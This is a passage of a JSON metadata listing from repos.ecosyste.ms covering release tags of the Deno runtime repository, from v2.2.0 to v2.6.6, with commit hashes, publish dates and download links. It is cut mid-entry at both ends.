ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v